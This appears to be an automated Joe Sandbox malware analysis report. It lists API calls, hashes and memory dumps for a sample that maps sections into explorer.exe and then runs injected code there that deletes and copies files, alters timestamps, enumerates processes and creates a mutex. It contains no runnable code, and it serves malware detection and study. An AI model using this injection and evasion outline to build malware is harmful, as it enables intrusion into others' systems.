NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24

Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: Section$View$Create
String ID:
API String ID: 33071139-0
Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B

Function 00403005 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403139
NtTerminateProcess.NTDLL ref: 00403152

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 9349ae55c142a47270c9c73eabb89239111d3cd47c98212c67b606f4e0ccd907
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: C5412531218E088FD7A8EF6CA88576377D5F798311F6643AAE809D3389EA34DC5187C5

Function 005F4C48 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005F4C70
Module32First.KERNEL32(00000000,00000224), ref: 005F4C90

Memory Dump Source

Source File: 00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 005EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8e48648d00941eaf4401a52e74464d3554647b0e6f455bba0e1092ad6e64a005
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B3F06D322017196BD7203BF9A98DA7F7AECBF89724F101529F746924C0DBB8EC454A61

Function 004F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004F024D

Strings

kernel32.dll, xrefs: 004F008F, 004F0095
cess, xrefs: 004F018D

Memory Dump Source

Source File: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 83880b094ae64c264b2fc075c34aefdff4589c7d83e42e366babc69d92f96334
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 6E527A74A01229DFDB64CF58C984BA9BBB1BF09304F1480DAE50DAB352DB34AE85DF15

Function 004F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,004F0223,?,?), ref: 004F0E19
SetErrorMode.KERNELBASE(00000000,?,?,004F0223,?,?), ref: 004F0E1E

Memory Dump Source

Source File: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0f54c85112c70c8300c1c69f5b337ed9408a1e8e4429274e0b8fc5c206ebf4b7
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 37D0123154512CB7D7002A94DC09BDE7B1CDF05B62F008411FB0DD9181C774994046E9

Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B

Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B

Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B

Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B

Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B

Function 005F4907 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005F4958

Memory Dump Source

Source File: 00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 005EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 085c0f954417309b83168f673c5e81fdb1f8666071698826cd6e0a9a711028de
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 29113279A00208EFDB01DF98C985E99BFF5AF08350F058094FA489B361D375EA50DF40

Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B

Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388,0000006E), ref: 00401999

Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B

Non-executed Functions

Function 004F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 004F09DC, 004F09DF, 004F09E4
l, xrefs: 004F0966
., xrefs: 004F095F

Memory Dump Source

Source File: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: ee8d9548c56cb374e40298a9480588cf3b25a9a1b09fae618662e7862dfbde42
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: E3316EB6900609DFDB10CF99C880AAEBBF5FF48324F54404AD541A7312D7B5EA45CFA4

Function 005F4525 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 005EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 5ee4f932e13bde47adf8f9d2f2b3a21610db4a8b08f504854693dfd7722b8a26
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 6C1170723401049FD744DE55DC91EB777EAFB89320B298165EA08CB315D679EC02CB60

Function 004F0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_br0A8E2X6I.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 2b3fd6cf4533f3a8e818fb1884d4457831b369b992358946cb87bab4cba5e53e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 3701A7766016088FDF21CF64C904BBB33E5FBD6316F4544A6DA0697342E778A9418B94

Function 004023E5 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220

Function 004026A0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097324360.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_br0A8E2X6I.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2

Analysis Process: explorer.exePID: 1028, Parent PID: 5604COMMON

Execution Graph

Execution Coverage:	44.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	110
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 011235B8 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32 ref: 0112360C

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
Instruction ID: 65a9e36fd2bf167285702f53515fc1422f1b7d9f23893a2207694108e7a7d375
Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
Instruction Fuzzy Hash: 09113A30718B5D4FCBD4EF6890583AEB6D2FBEC314F400A6E984EC3254DB788A558781

Function 01122434 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 506
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 0112279B
DeleteFileW.KERNEL32 ref: 011227A8
SleepEx.KERNEL32 ref: 01122809
RtlExitUserThread.NTDLL ref: 01122811

Strings

|:|, xrefs: 01122554

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: DeleteFile$ExitSleepThreadUser
String ID: |:|
API String ID: 2796381497-3736120136
Opcode ID: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
Instruction ID: 696e762c862123743bf9f5818b2b4d3c0c4e4e9e8e9c152b7a8b10e772fb1ac9
Opcode Fuzzy Hash: af6f0522112b9facc9e0093e301f45ffe89ead3b77408e0bdccb132fd8c44f9d
Instruction Fuzzy Hash: F2E1A530718F698FDB5DAB2C84587AE76D1FB98315F10462ED49FC3281DF34A9128786

Function 0112202C Relevance: 7.7, APIs: 5, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 011220B6
CopyFileW.KERNEL32 ref: 011220C5
DeleteFileW.KERNEL32 ref: 011220D6
DeleteFileW.KERNEL32 ref: 01122121

Part of subcall function 01124A48: SetFileAttributesW.KERNEL32 ref: 01124A97
Part of subcall function 01124A48: CreateFileW.KERNEL32 ref: 01124AC1
Part of subcall function 01124A48: SetFileTime.KERNEL32 ref: 01124AEC

CreateFileW.KERNEL32 ref: 011221AD

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCopyTime
String ID:
API String ID: 642576546-0
Opcode ID: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
Instruction ID: 635915ef1df2d8410f85847b4b7d0e58e719b50690bba75f96f58f5a0476f967
Opcode Fuzzy Hash: 7f063b496fdb5386f4a3bc3b38053528e15544823e1f82b1c44872616a46c509
Instruction Fuzzy Hash: 74415920718A5D4FDBA8AF6C98583AE35D2EBDC314F10012EE94EC7385DE389D168785

Function 01121AF8 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 01121C0F
CreateThread.KERNEL32 ref: 01121DCA
CreateThread.KERNEL32 ref: 01121DF1

Strings

iP+, xrefs: 01121D5A

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$Heap
String ID: iP+
API String ID: 1054751041-51890417
Opcode ID: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
Instruction ID: 485d400d9c394f801202f85406bb1fa6b91b92db61b6a800a80bf034797144a1
Opcode Fuzzy Hash: cf2ce30ea219674eb12de4e5a02e896239f1aaebb65970fad36a83100eea2f65
Instruction Fuzzy Hash: 7691AF30618A198FDF5CEF28DC826A573E6FBA8300B180179DC4ECB156EB30D561CB96

Function 01124A48 Relevance: 4.6, APIs: 3, Instructions: 84
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 01124A97
CreateFileW.KERNEL32 ref: 01124AC1
SetFileTime.KERNEL32 ref: 01124AEC

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateTime
String ID:
API String ID: 1986686026-0
Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
Instruction ID: 2272900b51e941227ffa45d25110043ea5975c1fce08a1088c15a612b06e35be
Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
Instruction Fuzzy Hash: 2821063071CA484FDF64EF58948879E76E2FBDC705F10456DA85EC7245DA34DA058782

Function 01123D1C Relevance: 4.6, APIs: 3, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 01123D3E
Process32First.KERNEL32 ref: 01123D5D
SleepEx.KERNEL32 ref: 01123DC0

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFirstProcess32SleepSnapshotToolhelp32
String ID:
API String ID: 2331296625-0
Opcode ID: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
Instruction ID: 82d97e5b9aec95cdce152b2a2b9293aef27532da0662af86d490a4dc8bed0488
Opcode Fuzzy Hash: 39ba45db73bafd81c11e774f87e0f4933b4a983672c3a76259ecfbbd9f04089f
Instruction Fuzzy Hash: C321E430224A0D8FEB5CEF28C0887AE76E2FB8C315F580A3ED95FDA185DB3894558751

Function 011240A4 Relevance: 3.4, APIs: 2, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
Instruction ID: 6310f2aa7da547b4085bcfcd8ce9c7307603f5df3e4aff5b374f061cad178000
Opcode Fuzzy Hash: 2a8d4c325c00e7065d788230daaf221fb62076a87581a91d4545f0ee69f183fa
Instruction Fuzzy Hash: B4D19230718B598FDB68EF6CD4456AEB7E2FB98701F10452DE44AC3241DF74E8128B86

Function 01124F28 Relevance: 3.1, APIs: 2, Instructions: 122
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNEL32 ref: 01124FAD
ObtainUserAgentString.URLMON ref: 01125016

Memory Dump Source

Source File: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, Offset: 01121000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1121000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainQueryStringUserValue
String ID:
API String ID: 4107646653-0
Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
Instruction ID: 5d59932bab8964ad69013e6dd3936854996a7e8d9f541111199d65f07ad2d5c7
Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
Instruction Fuzzy Hash: 5631D23160CA198FDB1CEF6CD8896EA77D2FB98324F00027AE84AC7541EF74981247D1

Function 01121EB4 Relevance: 3.1, APIs: 2, Instructions: 121
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01124DB8: GetVolumeInformationA.KERNEL32 ref: 01124E25

CreateMutexExA.KERNEL32 ref: 01121F27
CreateFileMappingA.KERNEL32 ref: 01121FD9

Memory Dump Source
